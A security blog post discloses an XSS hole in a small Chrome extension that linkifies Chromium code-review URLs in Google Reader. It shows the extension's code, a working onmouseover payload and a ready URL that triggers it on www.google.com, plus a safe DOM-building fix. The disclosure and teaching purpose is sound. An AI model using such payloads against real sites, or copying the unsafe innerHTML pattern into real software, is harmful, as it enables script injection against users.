For a few days now I've been reading the code of various Chrome extensions looking for vulnerabilities (see also the first post of the series). There are many. Most of them are due to lazy programming (ignoring even the Google docs on the subject); some are more subtle, stemming from poor design decisions.
As for the risk impact though, there are catastrophic vulnerabilities. This is just a sample of what code is committed to the Chrome Web Store and can be downloaded as a Google Chrome extension.
How would you like an XSS on google.com?
Chrome extensions can alter the contents of a webpage you're navigating (if they have the permission for that URL). In web security, what is the worst thing you can do when altering an HTML document on the fly? XSS, of course. Even if the page itself is totally safe from XSS, an extension might introduce one (it's similar to just entering javascript:code() in the address bar), and the page cannot possibly defend itself from it (more or less).

Google's documentation about Chrome extensions warns about this exact threat. But, as it turns out, seeing is believing, so there you go. Let me tell you about a minor extension (196 users as of now, which is the only reason why I'm 0daying it now) that allowed me to XSS Google.
Meet Linkify
Linkify Code Review URLs for Google Reader is just what it says on the cover: if you follow Chromium code reviews inside Google Reader, you want the ability to click on a link. This extension is there for that, and just that. It upgrades link-like text for a certain domain on the Google Reader site to <a>nchors. How does it do it?
```json
// manifest.json
{
  "update_url": "http://clients2.google.com/service/update2/crx",
  "name": "Linkify Code Review URLs for Google Reader™",
  "version": "1.0.0",
  "description": "Does what it says",
  "content_scripts": [
    {
      "all_frames": true,
      "js": [ "ba-linkify.min.js", "jquery-1.6.2.min.js", "content.js" ],
      "matches": [ "https://www.google.com/reader/*" ],
      "run_at": "document_start"
    }
  ]
}
```

It attaches 3 JS files from the extension into any document under https://www.google.com/reader. The main logic in those files is:
```javascript
// content.js (the extension's own code, reformatted with comments)
// Runs for every node inserted anywhere in the Google Reader document.
window.addEventListener('DOMNodeInserted', handleEvent, false);

function browseAndLinkify(node) {
  if (!node) {
    return;
  }
  if (node.children && node.children.length > 0) {
    // Recurse into element children until a leaf element is reached.
    $.each(node.children, function(index, element) {
      browseAndLinkify(element);
    });
  } else {
    // Leaf element: its serialized HTML is rewritten and assigned back via innerHTML.
    if (node.innerHTML.indexOf('http://codereview.chromium.org/') > -1) {
      node.innerHTML = linkify(node.innerHTML);
    }
  }
}

function handleEvent(event) {
  browseAndLinkify(event.target);
}
```

So every leaf node in the document whose HTML contains 'http://codereview.chromium.org/' gets linkified (linkifying converts http://anything into <a href="http://anything">anything</a>) and the result is reinserted into the DOM using innerHTML. Which smells like XSS.
Exploitation
Manipulating any node in Google Reader to start with http://codereview.chromium.org and having the XSS payload bypass the linkify engine is very simple. In the Google Reader search box just start searching for:

http://codereview.chromium.org/"onmouseover="if(!window.a){alert(document.domain);window.a=1}//" ddd
and mouseover. Or, even better, visit this handy URL (of course, with the extension installed):
https://www.google.com/reader/view/#search/http%3A%2F%2Fcodereview.chromium.org%2F%22onmouseover%3D%22if(!window.a)%7Balert(document.domain)%3Bwindow.a%3D1%7D%2F%2F%22%20ddd/
[Screenshot: Voilà! XSS on www.google.com]
Lessons to take
Google Extension authors - don't use innerHTML with anything outside your control. Really!
Users - pay attention to what you're installing.
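To make the first lesson concrete, here is an added example (my own, not the extension's code and not ba-linkify): a simplified regex linkifier in the unsafe innerHTML form used by content.js above, next to a version that splits the node's text and builds anchors with createElement/setAttribute, so a quote inside the "URL" stays data instead of closing the href attribute. The URL regex, the hypothetical `doc` factory interface and the sample string are assumptions constructed for this illustration.

```javascript
// Added illustration, not the extension's code: a minimal regex linkifier
// (standing in for ba-linkify) in the unsafe innerHTML-template form and in
// a DOM-building form that cannot introduce markup.
const URL_RE = /https?:\/\/\S+/g;

// Unsafe: treats the element's serialized HTML as a template string.
// A double quote inside the matched "URL" terminates the href attribute,
// so whatever follows becomes new attributes on the <a> element.
function unsafeLinkifyHtml(html) {
  return html.replace(URL_RE, (url) => `<a href="${url}">${url}</a>`);
}

// Safe, step 1: split plain text (node.textContent, never innerHTML) into
// literal text runs and URL runs. No markup is produced here at all.
function splitLinks(text) {
  const segments = [];
  let last = 0;
  for (const m of text.matchAll(URL_RE)) {
    if (m.index > last) segments.push({ type: 'text', value: text.slice(last, m.index) });
    segments.push({ type: 'link', value: m[0] });
    last = m.index + m[0].length;
  }
  if (last < text.length) segments.push({ type: 'text', value: text.slice(last) });
  return segments;
}

// Safe, step 2: build real nodes. setAttribute() and textContent store the
// string as data, so a quote in the URL can never open a new attribute.
// `doc` is assumed to offer createDocumentFragment/createElement/createTextNode
// (the browser `document` does; the caller replaces the text node with the fragment).
function renderLinks(text, doc) {
  const frag = doc.createDocumentFragment();
  for (const seg of splitLinks(text)) {
    if (seg.type === 'link') {
      const a = doc.createElement('a');
      a.setAttribute('href', seg.value);
      a.textContent = seg.value;
      frag.appendChild(a);
    } else {
      frag.appendChild(doc.createTextNode(seg.value));
    }
  }
  return frag;
}

// Constructed sample: a search string of the same shape as the one in the post,
// as it would sit in a Google Reader leaf element before the extension touches it.
const SAMPLE_TEXT = 'http://codereview.chromium.org/"onmouseover="alert(1)//" ddd';
```

The unsafe function turns the sample into an anchor whose href ends at the first quote and gains an onmouseover attribute; the safe path yields one anchor with exactly one attribute and one text node.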